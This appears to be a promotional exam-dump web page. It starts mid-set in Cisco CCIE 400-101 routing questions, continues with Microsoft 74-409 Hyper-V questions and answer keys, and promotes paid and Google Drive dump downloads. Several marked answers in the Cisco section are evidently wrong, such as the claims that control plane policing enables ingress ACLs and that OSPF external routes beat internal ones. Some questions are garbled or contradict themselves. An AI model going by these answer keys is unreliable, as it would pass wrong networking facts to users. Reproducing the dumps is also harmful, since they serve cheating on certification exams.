E. EIGRPlearned routes are automatically summarized
Correct Answer: AE

 

QUESTION 13
Router A(AS 65000)———————-Router C(AS 65005)———————–AS 65010
| |
————————-Router B(AS 65005)——————–
Router CAS 65010 Path
65005 65010 65010
Local Preference 200
Med 200
Router B
AS 65010 Path
65005 65010
Med 200
Refer to the exhibit.Router A is connected as a BGP neighbor to routers B and C. which path does router A
use to get to AS 65010?
A. through router B because it has the shortest AS path
B. through router B because the default local preference is 500 and higher than router C
C. will load balance because both routers have the same Med value
D. through router C because it has a higher local preference
Correct Answer: D

 

QUESTION 14
which two statements about IP SLA are true?(choose two)
A. It uses NetFlow for passive traffic monitoring
B. SNMP access is not supported
C. It can measure MOS
D. It is Layer 2 transport-independent
E. The IP SLA responder is component in the source Cisco device
F. It uses active traffic monitoring
Correct Answer: DF

 

QUESTION 15
When you deploy DMVPN, what is the purpose of the command crypto isakmp key ciscotest address
0.0.0.0?
A. It configured on hub to set the pre-shared key for the spoke routers
B. It configured on the Internet PE routers to allow traffic to traverse the ISP core
C. It configured on the spokes to indicate the hub router
D. It configured on hub and spoke router to establish peering
Correct Answer: A

 

QUESTION 16
which feature can be used to allow hosts with routes in the global routing table to access hosts in a VRF?
A. route target communities
B. address families
C. route leaking
D. extended communities
Correct Answer: C

 

QUESTION 17
From which component does an IS-IS router construct its linke-state database?
A. LSAs
B. LSPs
C. hello packets
D. SPTs
Correct Answer: B

 

QUESTION 18
Refer to the exhibit.pass4itsure 400-101 exam question

which two configurations must you apply to the master controller and the border router to provide then
(choose two)?
A. Border#
key chain PFR
key 0
key-string Cisco
pfr border
logging
local loopback 0
B. Master#
key chain PFR
key 0
key-string Cisco
pfr master
logging
border 10.1.1.3 key-chain PFR
interface GigabitEthernet0/0/0 internal
interface GigabitEthernet0/0/1 external
interface GigabitEthernet0/0/2 external
C. Border#
key chain PFR
key 0
key-string Cisco
pfr border
logging
local loopback 0
master 10.1.1.1 key-chain PFR
D. Master#
key chain PFR
key 0
key-string Cisco
pfr master
logging
border 10.1.1.3 key-chain PFR
interface GigabitEthernet0/0/1 internal
interface GigabitEthernet0/0/0 external
E. Master#
key chain PFR
key 0
key-string Cisco
pfr borderlogging
local loopback 0
master 10.1.1.1 key-chain PFR
F. Border#
key chain PFR
key 0
key-string Cisco
pfr master
logging
border 10.1.1.3 key-chain PFR
interface GigabitEthernet0/0/1 internal
interface GigabitEthernet0/0/0 external
interface GigabitEthernet0/0/2 external
Correct Answer: BC

 

QUESTION 19
how does control plane policing protect the route processor?
A. It treats the route processor as a separate entity within MQC
B. It disables access to the control plane during an attack
C. It dynamically enables ingress ACLs on selected interfaces
D. It marks non-essential traffic and moves it to the Scavenger class
Correct Answer: C

 

QUESTION 20

O E2 172.16.20.0/24 [10/20] via 10.32.32.2. 00:01:44, FastEthernet2/1

Refer to the exhibit. which statement about the R3 network environment is true?
A. 172.1.20.0/24 has an administrative distance of 20
B. The administrative distance for 172.16.X.X addresses is 110
C. OSPF external routes are preferred over OSPF internal routes
D. RIP, OSPF and IS-IS are running
Correct Answer: C

 

QUESTION 21
What can PfR passive monitoring mode measure for UDP flows?
A. loss
B. delay
C. reachability
D. throughput
Correct Answer: D

 

QUESTION 22
hosts————————R1———–R2——————R3————Internet
R1
int f0/0
ip add 192.168.12.1 255.255.255.0router ospf1
nwtwork 192,168.0.0 0.0.255.255
R2
int f0/0
ip add 192.168.12.2 255.255.255.0
router ospf1
nwtwork 192,168.0.0 0.0.255.255
default-information originate
ip route 0.0.0.0 0.0.0.0 F0/1
Refer to the above. You notice that router R2 is experiencing high CPU usage. which action can you take
to correct the problem?
A. Configure the next-hop address for the R2 default route
B. Configure OSPF on the connection between R2 and the ISP
C. Configure R2 to advertise an area summary route between R2 and R1
D. Remove the default-information originate command from the R2 configuration
Correct Answer: A

 

QUESTION 23
Which two statementsabout MSDP are true?(choose two)
A. It requires multicast receivers to be in the same domain
B. It uses loopback interfaces for anycast RPaddress
C. It requires multicast sources to be in the same domain
D. It uses 32-bit anycast RP address
E. All MSDP domains on a given network can share a common RP
F. It uses UDP to establish peering sessions
Correct Answer: BD

 

QUESTION 24
You are using the limited scope multicast IP address 239.128.0.1 for a high volume data distribution
application. what symptom would you expect to find in the network?
A. The video traffic cannot be handled by a limited scope multicast address
B. There is no problem and the network is performing smoothly , just as designed
C. The high volume traffic is being sent to the 224.128.0.1 multicast address as well as on the original
address, causing high network load on all multicast subnets
D. The high volume application creates high network traffic load on all systems on the subnets where the
video is being sent.
Correct Answer: B

 

QUESTION 25
which three session tables does NAT64 maintain?
A. UDP
B. TCP
C. 6rd
D. 464XLATE. ICMP Query
F. SIP
Correct Answer: ABE

 

QUESTION 26
Which two events occur when a packet is decapsulated in a GRE tunnel?(Choose two)
A. The destination IPv4 address in the IPv4 payload is used to forward the packet
B. The source IPv4 address in the IPv4 payload is used to forward the packet
C. The GRE keepalive mechanism is reset
D. The version field in the GRE header is incremented
E. The TTL of the payload packet is decremented
F. The TTL of the payload packet is incremented
Correct Answer: AE

 

QUESTION 27
R1#showip ospfinterface FastEthernet0/0.12
…Network Type
Non_BROADCAST…

R2#showip ospfinterface FastEthernet0/0.12
…Network Type
BROADCAST…

Refer to the exhibit. OSPF is configured on R1 and R2 as shown. which action can you take to allow a
neighbor relationship to be established.
A. On R1, change the process ID to 1
B. On R1, set the network type of the FastEthernet0/0.12 interface to broadcast
C. Configure R1 and R2 as neighbors using interface addresses
D. Configure R1 and R2 as neighbors using router IDs
Correct Answer: B

 

QUESTION 28
which two statements about MLD are true?(choose two)
A. The code section in the MLD message is set to 1 by the sender and ignored by receivers
B. MLD is a subprotocol of PIMv6
C. There are three subtypes of MLD query messages
D. MLD is a subprotocol of ICMPv6
E. When a single link supports multiple interfaces, only one interface is required to send MLD messages
F. When a single link supports multiple interfaces, all supported interface is required to send MLD
messages
Correct Answer: DE

 

QUESTION 29
Which two statementsabout redistribution are true?((choose two)A. When BGP traffic is redistributed into OSPF, Ebgp and iBGP routes are advertised
B. When EIGRP routes on a CE are redistributed through a PE into BGP, the Cost Community POI is set
automatically
C. When BGP traffic is redistributed into OSPF, the metric is set to 1 unless the metric is defined
D. When OSPF traffic is redistributed into BGP , internal and external routes are redistributed
E. iBGP routes automatically redistribute into the IGP if the routes are in the routing table
F. When EIGRP traffic is redistributed into BGP, a default metric is required
Correct Answer: BC

 

QUESTION 30
which statement about the BGP scope of the cost community is true?
A. It is shared with IBGP neighbors and route reflectors
B. It is shared with IBGP and EBGP neighbor
C. It is shared with IBGP neighbors only
D. It is shared with IBGP and confederation peers
E. It is shared with EBGP neighbors only
Correct Answer: D

 

QUESTION 31
which three statements about the route preference of IS-IS are true?(choose two)
A. An L1 path is preferred over an L2 path
B. Within each level, a path that supports optional metric is preferred over a path that supports only the
default metric
C. The Cisco IS-IS implementation usually performs equal cost path load balancing on up to eight paths.
D. An L2 path is preferred over an L1 path
E. Both L1 and L2 routes will be installed in the routing table at the same time
F. Within each level of metric support, the path with the lowest metric is preferred.
Correct Answer: ABF

 

QUESTION 32
which routing protocol is used on PE routers to exchange VPNv4 routes?
A. OSPF
B. OSPFv3
C. MB-BGP
D. EIGRP
Correct Answer: C

 

QUESTION 33
Which command sequence must you enter to configure SSH access to a Cisco router?
A. A.ip ssh version ip domain-name crypto key zeroize
B. B.hostname ip domain-lookup crypto key generate rsa
C. C.hostname ip domain-name crypto key zeroize
D. D.ip ssh version ip domain-name crypto key generate rsa
E. E.ip shs version ip domain-lookup crypto key zeroize
F. F.hostname ip domain-name crypto key generate rsa
Correct Answer: F

 

QUESTION 34
which option describes how the IP address is assigned when you configure a Layer3 EtherChannel
interface?
A. The first IP address added to the EtherChannel is used automatically
B. You must assign the IP address to a port channel logical interface
C. The last IP address added to the EtherChannel is used automatically
D. You must assign the IP address to the tunnel interface
Correct Answer: B

 

QUESTION 35
Which option describes the purpose of the no ip next-hop-self eigrp configuration line in DMVPN
deployment?
A. It allows the spoke routers to change the next hop value when sending EIGRPupdates to the hub
router
B. It enables EIGRPto dynamically assign the next hop value based on the EIGRPdatabase
C. It allows the spoke routers to change the next hop value when sending EIGRPupdates to the spoke
router
D. It preserves the original next hop value as learned by the spoke routers
E. It preserves the original next hop value as learned by the hub routers
Correct Answer: D

 

QUESTION 36
which type of IPv6 address is 2001:DB8::FFFF:FFFF/32?
A. multicast address
B. host address
C. broadcast address
D. anycast address
Correct Answer: B

 

QUESTION 37
Refer to the exhibit.pass4itsure 400-101 exam question

R2 is configured with an IP helpler address on Gi0/0/0 and it is sharing routes with R1 using OSPF. If PC1
is configured to request an IP address from the DHCP server, which two statements correctly describe
communications between the devices on the netwok?(choose two)
A. R1 forwards DHCPREQUEST messages to IP address 172.16.1.100
B. PC1 sends DHCPDISCOVER messages to IP address 255.255.255.255
C. R1 forwards DHCPDISCOVER messages to IP address 255.255.255.255
D. PC1 sends DHCPREQUEST messages to IPaddress 255.255.255.255
E. R1 forwards DHCPOFFER messages to IP address 172.16.1.100Correct Answer: AB

 

QUESTION 38
when is it useful to disable split horizon on an EIGRP interface?
A. Disable it when you want to sent routes that are learned from another routing protocol to peer on the
same interface
B. Disable it when you want to provide additional backup paths in your network
C. It is never advisable to disable split horizon on an EIGRP interface
D. Disable it when you need to send updates to peers on the interface on which the updates were
received
Correct Answer: D

 

QUESTION 39
Which two authentication options were new in SNMPv3 (Choose two)
A. noAuth
B. Auth
C. noAuthNopriv
D. authNoPriv
E. authPriv
F. Priv
Correct Answer: CD

 

QUESTION 40
how does an EIGRProuter respond when it receives a query for a route it is in the process of poisoning?
A. It forwards the query to other neighbors
B. It adds the route to its route table
C. It sends a posion squash message to the to the querying neighbor
D. It notifies the querying neighbor to add the route
Correct Answer: C

 

QUESTION 41
which condition must be true to allow an access port to trust QoS markings on an incoming frame?
A. The switch must be configured globally with the vlan dot1q tag native command
B. The switch must be configured globally with the mls qos trust cos command
C. The port must be configured with the mls qos trust dscp command
D. The port must be configured with the mls qos cos command
Correct Answer: C

 

QUESTION 42
Which two statements about Cisco Express Forwarding load balancing are true?(choose two)
A. Each hash maps directly to a single entry in the RIB
B. Cisco Express Forwarding can load-balance over o maximum of two destinations
C. It combines the source and destination IP address to create a hash for each destination
D. It combines the source IP address subnet mask to create a hash for each destination
E. Each hash maps directly to a single entry in the adjacency table
Correct Answer: CE

 

QUESTION 43
which type of access-list will allow incoming traffic for sessions that originated from within your network?
A. reflexive ACLs
B. time-based ACLs
C. dynamic ACLs
D. standard ACLs
Correct Answer: A

 

QUESTION 44
which two statements about route redistribution default metrics are true?(choose two)
A. When IGP is redistributed into RIP, it has a default metric of 1
B. When IGP is redistributed into IS-IS, it has a default metric of 115
C. When IGP is redistributed into OSPF, it has a default metric of 110
D. When EIGRP is redistributed into OSPF as E2, it has a default metric of 20
E. When BGP is redistributed into OSPF, it has a default metric of 1
Correct Answer: DE

 

QUESTION 45
Refer to the exhibit.pass4itsure 400-101 exam questionIf the given network is in the process of being migrated from EIGRP to OSPF , includes
external routes, and all routers are currently running both protocol action must you perform to complete the
migration?
A. Change the EIGRP Administrative Distance to 111, wait until all routers are present, and then change it
back to the default value.
B. Change the OSPF Administrative Distance to 91, wait until all routers are present, and then change it
back to the default value.
C. Change the EIGRP Administrative Distance to match the OSPF Administrative Distance, wait until all
Routers are present, and then change the EIGRP Administrative Distance back to the default value.
D. Change the OSPF Administrative Distance to 171, wait until all routers are present, and then change itback to the default value.
Correct Answer: D

 

QUESTION 46
interface tunnel0
tunnelmode ipv6ip 6to4
tunnelsource 125.203.89.1
ipv6 address ?
Which statement is true about a valid IPv6 address that can be configured on tunnel interface0?
A. 2001:7DCB:5901::/128 is a valid IPv6 address
B. There is not enough information to calculate the IPv6 address
C. 6to4 tunneling allows you to use any IPv6 address
D. 2002:7DCB:5901::/128 is a valid IPv6 address
Correct Answer: D

 

QUESTION 47

event manager applet OSPF
event syslog parttern “%OSPF-S-ADJCHG: Process 1 , Nbr 10.0.0.2 on GigabitEthernet0/1 from FULL to
DOWN,…” …
Refer to exhibit. which two statementsabout the network environment must be true?(choose two)
A. If the administrator enters the show ip ospf neighbor gigabitEthernet0/1 command, the output is blank
B. The applet runs only after OSPF neighbors are verified
C. An OSPF neighbor relationship is established when the interface recovers
D. A BGP neighbor relationship is established over GigabitEthernet0/1
E. The applet runs befor any commands are executed
Correct Answer: AB

 

QUESTION 48
which two statements about MLD are true?(choose two)
A. MLD is a subprotocol of PIMv6
B. When a single link supports multiple interfaces, only one interface is required to send MLD messages
C. MLD is a subprotocol of ICMPv6
D. When a single link supports multiple interfaces, all supported interface are required to send MLD
messages
E. There are three subtypes of MLD query messages
F. The code section in the MD message is sent to 1 by the sender and ignored by receivers
Correct Answer: BC

 

QUESTION 49
which mechanism can be used on Layer 2 switches so that only multicast packets with downstream
receivers are sent on the multicast router-connected ports?
A. Router GuardB. IGMP snooping
C. multicast filtering
D. PIM snooping
Correct Answer: D

 

QUESTION 50
R1(E0/0)—————-IPSec VTI Tunnel——————R2(E0/1)
Refer to the exhibit. when packets are transmitted from R1 to R2, where are they encrypted?
A. within the crypto map
B. on the E0/0 interface on R1
C. on the outside interface
D. on the E1/0 interface on R2
E. in the forwarding engine
F. in the tunnel
Correct Answer: F

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video.
Follow channels: https://www.youtube.com/channel/UCTP5RClZrtMxtRkSvIag0DQ get more useful exam content.

Latest 50 Cisco CCIE 400-101 YouTube videos:

Bsabio is updated with effective exam dumps throughout the year, and we help many people improve their test skills and success rates.
If you like us, please pay attention to us. The latest Cisco CCIE 400-101 Exam Practice test questions and answers “CCIE Routing and switching written Exam (400-101)” are provided by Pass4itsure Cisco experts, and if you want to get a 400-101 exam certificate Please select: https://www.pass4itsure.com/400-101.html (Q&As:1501 PDF + VCE).

[PDF] Free Cisco CCIE 400-101 dumps download from Google Drive: https://drive.google.com/open?id=1yUXI5__rzwk6b-gDtk21xpYcCP68jPHZ

[PDF] Free Full Cisco dumps download from Google Drive: https://drive.google.com/drive/folders/1dq6fv9FX6zSDDoHc3ge-WzVU9SNaUbsH

Pass4itsure Promo Code 15% Off

pass4itsure 400-101 coupon

related: https://www.bsabio.org/200-150-dumps-dcicn-pdf/

Free Share 40 Microsoft 74-409 exam dumps With 74-409 PDF

Pass4itsure helps you easily pass through Microsoft Windows Server 2012 74-409 Exam.Truly valid Microsoft 74-409 exam dump and 74-409 pdf free download. Bsabio free to share 40 Microsoft 74-409 Exam Dump online
Practice tests to help you improve your skills, full version of 74-409 VCE dump and PDF dumps:https://www.pass4itsure.com/74-409.html (q&as:99 latest update)

[PDF] Free Microsoft Windows Server 2012 74-409 dumps download from Google Drive: https://drive.google.com/open?id=10H3OZstgJdCsBPuNpl2_7En59vTnWqdt

[PDF] Free Full Microsoft dumps download from Google Drive: https://drive.google.com/open?id=1gdQrKIsiLyDEsZ24FxsyukNPYmpSUDDO

Exam 74-409: Server Virtualization with Windows Server Hyper-V and System Center: https://www.microsoft.com/en-us/learning/exam-74-409.aspx

Who should take this exam?
Candidates for this exam are IT professionals who are responsible for designing, implementing, managing,
and maintaining a virtualization infrastructure and/or who are interested in validating their skills on current Microsoft
virtualization technologies.

Pass4itsure offers the latest Microsoft Windows Server 2012 74-409 practice test free of charge (40Q&As)

QUESTION 1
You administer a Windows Server 2012 R2 server that has the Hyper-V role installed. You deploy a new virtual machine. You add two virtual network adapters to the virtual machine. You need to ensure that the virtual machine maintains
network connectivity if one virtual network adapter fails.
What should you do?
A. Run the Windows PowerShell cmdlet Enable-VMReplication.
B. Enable Dynamic Host Configuration Protocol (DHCP) Guard.
C. Run the Windows PowerShell cmdlet Set-VMHost.
D. Run the Windows PowerShell cmdlet Set-VMNetworkAdapter.
Correct Answer: D
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/hh848457.aspx

QUESTION 2
You administer a server that runs Windows Server 2012 R2 that has the Hyper-V role installed. You plan to apply an update to a virtual machine (VM). You have the following requirements:
You must be able to quickly revert back to a pre-update state.
The solution must minimize storage requirements on the server.
You need to apply the update. What should you do?
A. Run the Windows PowerShell cmdlet New-VirtualDiskClone.
B. Create a checkpoint of the VM.
C. Run the Windows PowerShell cmdlet Export-VMSnapshot.
D. Export the VM.
Correct Answer: B
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/cc956044.aspx

QUESTION 3
A company has Windows Server 2012 R2 servers that have the Hyper-V role installed. The guest virtual machines are configured as follows:pass4itsure 74-409 exam dumps

You need to ensure that the environment supports online virtual hard disk resizing.
What should you do?
A. Convert the virtual machines to Generation 2 virtual machines.
B. Deploy clustered storage spaces.
C. Convert the drive format of the virtual machines to the VHDX file format.
D. Deploy Serial Attached SCSI (SAS).
Correct Answer: C
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/dn282286.aspx
Requirements
The following functionality is required for resizing a virtual hard disk:
A server capable of running Hyper-V. The server must have processor support for hardware virtualization. The Hyper-V role must be installed. ?A user account that is a member of the local Hyper-V Administrators group or the Administrators
group.
The following functionality is required for resizing a virtual hard disk:
VHDX – the ability to expand and shrink virtual hard disks is exclusive to virtual hard disks that are using the .vhdx file format. Online resizing is supported for VHDX disk types, including fixed, differencing, and dynamic disks. Virtual hard disks
that use the .vhd file format are not supported for resizing operations. ?SCSI controller – the ability to expand or shrink the capacity of a virtual hard disk is exclusive to .vhdx files that are attached to a SCSI controller. VHDX files that are
attached to an IDE controller are not supported.

QUESTION 4
A Windows Server 2012 R2 Hyper-V host server has four network adapters that are connected to two different network switches. The server contains a virtual machine named NYC-WEB.
You have the following requirements:
increase the available bandwidth for NYC-WEB
implement network fault tolerance for NYC-WEB without modifying network switch configurations
use the least amount of administrative effort
You need to configure the Hyper-V environment. What should you do first?
A. Enable NIC teaming. Configure the team to use Static Teaming mode.
B. Enable NIC teaming. Configure the team to use Switch Independent mode.
C. Enable Bandwidth Management on NYC-WEB.
D. Run the Windows PowerShell command Set-NetLbfoTeam -Name Team1 -TeamingMode Static.
Correct Answer: B
Explanation
Explanation/Reference:
Ref: http://blogs.technet.com/b/privatecloud/archive/2012/06/19/nic-teaming-in-windows-server- 2012-brings-simple-affordable-traffic-reliability-and-load- balancing-to-your-cloud- workloads.aspx

QUESTION 5
A company plans to create a Hyper-V environment that will contain three virtual machines (VMs). A limited amount of storage space is available to host the VMs.The VMs will be configured as follows:pass4itsure 74-409 exam dumps

You must maximize disk performance.
You need to recommend a storage solution.
Which type of virtual disk type should you configure for each VM?
A. pass-through
B. fixed
C. dynamically expanding
D. differencing
Correct Answer: B
Explanation
Explanation/Reference:
Ref: http://www.petri.co.il/choosing-hyper-v-storage-virtual-hard-disks-2.htm#
Virtual Disk Types
There are considerations for using virtual disks, and what types of virtual disks are available:
?Fixed–The VHD image file is pre-allocated on the backing store for the maximum size requested. ?Expandable–Also known as”;dynami”;,”;dynamically expandabl”;, and”;spars”;, the VHD image file uses only as much space on the backing
store as needed to store the actual data the virtual disk currently contains. When creating this type of virtual disk, the VHD API does not test for free space on the physical disk based on the maximum size requested, therefore it is possible to
successfully create a dynamic virtual disk with a maximum size larger than the available physical disk free space.
Note The maximum size of a dynamic virtual disk is 2,040 GB. ?Differencing–A parent virtual disk is used as the basis of this type, with any subsequent writes written to the virtual disk as differences to the new differencing VHD image file,
and the parent VHD image file is not modified. For example, if you have a clean- install system boot operating system virtual disk as a parent and designate the differencing virtual disk as the current virtual disk for the system to use. then the
operating system on the parent virtual disk stays in its original state for quick recovery or for quickly creating more boot images based on additional differencing virtual disks.
Note The maximum size of a differencing virtual disk is 2,040 GB.
All virtual disk types have a minimum size of 3 MB.
With Pass-through disks, you lose all of the benefits of VHD files such as portability, snap- shotting and thin provisioning. Performance is marginally better than that of VHD files. Reference: http://clusteringformeremortals.com/2009/09/25/
hyper-v-pass-through-disk- performance-vs- fixedsize-vhd-files-and-dynamic-vhd-files-in-windows-server-2008-r2/

QUESTION 6
A company has servers that run Windows Server 2012 R2. The company has one Active Directory Domain Services (AD DS) domain. A user reports that USB devices are not redirected when he uses the Virtual Machine Connection tool to
connect to a virtual machine. USB device redirection works for other users that connect to this VM.
You need to ensure that USB devices are redirected for all users when they connect to this VM.
What should you do?
A. Add the user as a member of the Administrators group on the VM.
B. Ensure that the Allow enhanced session mode setting is set to Enabled on the VM.
C. Ensure that the Remote Desktop Services service is running on the VM.
D. Add the user as a member of the Administrators group on the AD DS domain.
Correct Answer: A
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/dn282274.aspx
Re-direction works for other users on this VM. This means that Enhanced Session Mode is already enabled on the server and VM.
Additionally, Remote Desktop Services needs to be running, and the user account you use to sign in to the virtual machine needs to be a member of the Remote Desktop Users local group or the local Administrators group.

QUESTION 7
A company has seven Windows Server 2012 R2 virtual machines (VMs). The VMs are running and are accessible over the network. You plan to copy a large .ISO file from the host server to each of the VMs.
The copy operations must meet the following requirements:
The VMs must remain accessible over the network during the copy operations.
The copy operations must NOT use a network connection.
You need to configure the VMs. What should you do on each VM?
A. Enable the Guest services integration service.
B. Enable the Data Exchange integration service.
C. Add a network adapter, and then enable the virtual machine queue (VMQ) option on the adapters.
D. Set the value of the Smart Paging File Location property to %SYSTEMROOT%\temp.
Correct Answer: A
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/dn282278.aspx
Q: What is the new Guest services integration service in Windows Server 2012 R2 Hyper-V?
A: Several integration services are available for virtual machines (VMs) such as time synchronization, heartbeat, backup, OS shutdown, and data exchange. In Windows Server 2012 R2, a new integration service has been added, Guest
services. Guest services enables the copying of files to a VM using WMI APIs or using the new Copy-VMFile Windows PowerShell cmdlet.

QUESTION 8
A company has one central data center and five branch offices. Each office has three Hyper-V host servers that run Windows Server 2012 R2 Datacenter edition. Each branch office has a system administrator. You plan to deploy virtual
machines (VMs) that run Windows Server 2012 R2 Standard edition to each branch office.
You have the following requirements:
The VMs must be activated at the branch offices, even if the branch office has no Internet connectivity.
Activation keys must NOT be shared with the branch office administrators.
You must be able to track license usage from the central location, even without access rights to the VMs.
You must be able to verify license compliance and perform real time reporting on license usage from a central location.
You need to configure licensing and activation for the VMs.
Which feature or tool should you use?
A. Multiple Activation Key (MAK)
B. Volume Activation Management Tool (VAMT)
C. Key Management Service (KMS)
D. Automatic Virtual Machine Activation (AVMA)
Correct Answer: D
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/dn303421.aspx
Automatic Virtual Machine Activation (AVMA) acts as a proof-of-purchase mechanism, helping to ensure that Windows products are used in accordance with the Product Use Rights and Microsoft Software License Terms.
AVMA lets you install virtual machines on a properly activated Windows server without having to manage product keys for each individual virtual machine, even in disconnected environments. AVMA binds the virtual machine activation to the
licensed virtualization server and activates the virtual machine when it starts up. AVMA also provides real-time reporting on usage and historical data on the license state of the virtual machine.
Reporting and tracking data is available on the virtualization server.

QUESTION 9
A company consolidates multiple data centers into a single centralized datacenter by using a Windows Server 2012 R2 server that has the Hyper-V role installed.
You must be able to support chargeback based on the usage of the following resources:
average CPU usage per virtual machine (VM)
average physical memory used by a VM over a period of time
highest amount of memory assigned to a VM over a period of time
highest amount of disk spaced assigned to a VM over a period of time
You need to track the resources without installing any additional tools.
Which tool should you use?
A. Process Explorer
B. Resource Metering
C. Reliability Monitor
D. Resource Monitor
Correct Answer: B
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/hh831661.aspx

QUESTION 10
A company has a Windows Server 2012 R2 Hyper-V host server named NYC-HOST1 that hosts a virtual machine (VM) named NYC-VM1. A critical security update must be applied immediately to NYC-VM1. There is no time to test the
update before deployment. You must minimize the amount of time needed to restore the VM. You need to capture the state of NYC-VM1 before you install the critical security update.
What should you do?
A. From Hyper-V Manager, select NYC-VM1, and then create a checkpoint.
B. Run the Windows PowerShell command Save-VM NYC-VM1.
C. Run the Windows PowerShell command Get-VMSnapshot NYC-VM1.
D. Run the Windows PowerShell command Export-VMSnapshot NYC-VM1.
Correct Answer: A
Explanation
Explanation/Reference:
Explanation: A checkpoint is the Windows Server 2012 R2 Hyper-V name for a snapshot. A snapshot will save the state of the VM.
http://technet.microsoft.com/en-us/library/cc956044.aspx http://www.interweb.org.uk/2011/03/21/understanding-hyper-v-virtual-machine- snapshotscheckpoints/ http://technet.microsoft.com/en-us/library/dd560637(v=ws.10).aspx http://
technet.microsoft.com/en-us/library/hh848539.aspx

QUESTION 11
You administer a Windows Server 2012 R2 Hyper-V host server that contains production and test virtual machines (VMs). You plan to optimize the performance of the VMs.
The following settings must be applied to the VMs:
You must set a maximum value for the input/output operations per second (IOPS) on the test VMs.
You must set a minimum value for the IOPS on the production VMs.
You need to configure the environment. What should you do?
A. On all VMs, enable Network Quality of Service (QoS).
B. Create a shared virtual hard disk (VHD).
C. On the Hyper-V host server, enable Resource Metering.
D. On all VMs, enable Storage Quality of Service (QoS).
Correct Answer: DExplanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/dn282281.aspx

QUESTION 12
A company has a Windows Server 2012 R2 server that has the Hyper-V role installed. The server has a single processor and a single 10-gigabit network interface card (NIC). 12 virtual machines (VMs) run on the server.
You need to configure Hyper-V to allow higher network throughput and reduce processing overhead related to network operations. What should you do?
A. Run the Windows PowerShell command Set-VMNetworkAdapter -VmqWeight 0 on the VMs.
B. In Hyper-V Manager, disable the protected network option for all NICs on the VMs.
C. in Hyper-V Manager, enable the Single Root I/O Virtualization (SR-IOV) option on the VMs.
D. Disable Internet Protocol security (IPsec) task offloading on the VMs.
Correct Answer: C
Explanation
Explanation/Reference:
What is SR-IOV
Requires support in network adapter
Provides Direct Memory Access to virtual machines
Increases network throughput
Reduces network latency
Reduces CPU overhead on the Hyper-V server
Virtual machine bypasses virtual switch
Supports Live Migration, even when different SR_IOV adapters are used

QUESTION 13
You administer an environment that uses a Windows Server 2012 R2 Hyper-V cluster and System Center 2012 R2 Virtual Machine Manager (VMM). You plan to deploy two virtual machines (VMs) that host a line-of-business (LOB)
application. The VMs must reside on the same Hyper-V host server at all times. The LOB application does NOT require high availability.
You need to deploy the VMs.
What should you do?
A. Add a custom property to both VMs, and assign the same value to each property. Configure the Hyper-V host cluster to use the same custom property and value. Configure a custom placement rule that uses filters that are based on the
custom property and value.
B. Configure the VMs to use the same VM network.
C. Configure the VMs to reside on the same storage area networks (SANs).
D. Add a custom property to both VMs, and assign the same value to each property. Configure the VMs as members of the same availability set.
Correct Answer: A
Explanation
Explanation/Reference:
Ref: http://blogs.technet.com/b/scvmm/archive/2013/03/11/custom-placement-rules-and- availability-sets-in-scvmm-2012-sp1.aspx

QUESTION 14
You administer two Windows 2012 R2 servers that have the Hyper-V role installed. You plan to deploy a new Hyper-V cluster. The cluster instance must NOT be added to Active Directory.
You need to deploy the cluster. What should you do?
A. Use Hyper-V Manager to deploy the cluster.
B. Use Failover Cluster Manager to deploy the cluster.
C. Run the Windows PowerShell cmdlet New-Cluster. Specify ActiveDirectoryAndDNS for the AdministrativeAccessPoint parameter.
D. Run the Windows PowerShell cmdlet New-Cluster. Specify DNS for the AdministrativeAccessPoint parameter.
Correct Answer: D
Explanation
Explanation/Reference:
Ref: http://technet.microsoft.com/en-us/library/dn265970.aspx To deploy an Active Directory-detached cluster, you must use Windows PowerShell. You cannot use Failover
Cluster Manager.
To create the failover cluster, start Windows PowerShell as an administrator, and then use the New-Cluster cmdlet with the AdministrativeAccessPoint parameter set to a value of DNS.

QUESTION 15
You are the virtualization administrator for an organization that manages private and public cloud-based resources. The organization uses Windows Server 2008 R2 SP1 Hyper-V. All Hyper-V host servers are configured as nodes in a four-
node cluster. The organization also uses System Center 2012 R2.
Operating system updates to each host server require a system reboot. You need to ensure that the virtual machines remain online during any reboots required by the updates.
What should you do?
A. Apply updates by using the Virtual Machine Servicing Tool (VMST).
B. Configure orchestrated updates of Hyper-V host clusters in System Center 2012 R2 Virtual Machine Manager (VMM).
C. Implement cluster-aware updating with the Cluster-Aware Updating (CAU) wizard.
D. In System Center 2012 R2 Configuration Manager, add all of the servers to a collection.
Deploy updates to the collection.
Correct Answer: C
Explanation
Explanation/Reference:
http://technet.microsoft.com/en-us/library/hh831694.aspx
CAU is an automated feature that enables you to update clustered servers with little or no loss of availability during the update process. During an Updating Run, CAU transparently performs the following tasks:
?Puts each node of the cluster into node maintenance mode
?Moves the clustered roles off the node
?Installs the updates and any dependent updates
?Performs a restart if necessary
?Brings the node out of maintenance mode
?Restores the clustered roles on the node
?Moves to update the next node
For many clustered roles (formerly called clustered applications and services) in the cluster, the automatic update process triggers a planned failover, and it can cause a transient service interruption for connected clients. However, in the case
of continuously available workloads such as Hyper-V with live migration or file server with SMB Transparent Failover, CAU can coordinate cluster updates with no impact to the service availability.
Note
The CAU feature is only compatible with Windows Server 2012 R2 and Windows Server 2012 failover clusters and the clustered roles that are supported on those versions.

QUESTION 16
You have a Windows Server 2012 R2 Hyper-V environment that includes System Center 2012 R2 Virtual Machine Manager (VMM). The environment includes five physical servers. The servers are configured as follows:pass4itsure 74-409 exam dumps

You plan to use VMM to migrate physical machines to virtual machines. You must migrate all servers that support physical to virtual (P2V) migration.
You need to migrate the servers.
Which three servers should you migrate? Each correct answer presents part of the solution.
A. NYC-WEB
B. NYC-PR
C. NYC-DEV
D. NYC-FS
E. NYC-EX
Correct Answer: ABC
Explanation
Explanation/Reference:
The source computer cannot have any volumes larger than 2040 GB. This disqualifies NYC- FS( not D) and NYC-EX (not E).
Note:
* Requirements on the Source Machine
To perform a P2V conversion, your source computer:/Must have at least 512 MB of RAM.
/ Cannot have any volumes larger than 2040 GB.
/ Must have an Advanced Configuration and Power Interface (ACPI) BIOS Vista WinPE will not install on a non-ACPI BIOS.
